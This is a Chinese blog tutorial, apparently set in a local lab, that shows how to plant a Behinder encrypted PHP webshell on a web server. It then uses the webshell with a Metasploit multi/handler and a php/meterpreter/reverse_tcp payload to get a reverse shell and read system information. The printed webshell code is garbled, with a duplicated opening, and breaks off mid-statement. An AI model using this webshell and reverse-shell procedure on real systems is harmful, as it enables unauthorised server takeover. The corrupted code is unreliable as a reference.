冰蝎 连接木马到反弹shell拿到权限全过程

一.冰蝎简介

什么是冰蝎

“冰蝎”是一个动态二进制加密网站管理客户端。
在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。
基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。

一.冰蝎连接getshell方法

1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16]

<?php @errorreporting(0); session_start(); $key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond <?php @error_reporting(0); session_start(); $key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION[‘k’]=$key; $post=file_get_contents(“php://input”); if(!extension_loaded(‘openssl’)) { $t=”base64“.”decode”; $post=$t($post.””); for($i=0;$i

二.冰蝎getshell

1.建好的木马放入我们phpstudy网站的根目录
在这里插入图片描述

2.到我们的位置为 192.168.43.61/1.php
在这里插入图片描述

3.始连接冰蝎,点击保存

在这里插入图片描述
在这里插入图片描述

在冰蝎处 显示为此页面,则表示连接成功

三.开始反弹shell启用监听meterpreter功能

1.点击反弹shell
在这里插入图片描述

2.在IP地址上写上你本机kali的ip

2.1查找kali ip 的方法 命令框中输入 ip addr
在这里插入图片描述

3.2填上ip和端口,端口可以任意填写
在这里插入图片描述

此时注意不用那么快点击“给我连按钮”

4.先打开kali的msf监听设备 在命令框中输入msfconsole
在这里插入图片描述

此时为打开状态

5.使用use exploit/multi/handler 命令
在这里插入图片描述

此时弹出让我们输入payload的命令我们将此命令输入set payload php/meterpreter/reverse_tcp
在这里插入图片描述

此时输入成功

6.show options 我们就可以看设置了,我们会发现我们的靶机已经连上了
在这里插入图片描述

7.接着我们连上我们的主机 set lhost 192.168.43.61
在这里插入图片描述

8.Show options 我们会发现我们的主机已经连上
在这里插入图片描述

9.执行 exploit 命令执行监听,此时我们就可以返回冰蝎反弹shell执行接下来的操作
在这里插入图片描述

10 点击给我连
在这里插入图片描述

11.我们在返回kali 此时我们就已经可以开始监听了
在这里插入图片描述

12.执行 sysinfo 我们就可以知道靶机的系统信息
在这里插入图片描述

结束

黑客渗透视频教程,扫码免费领

在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值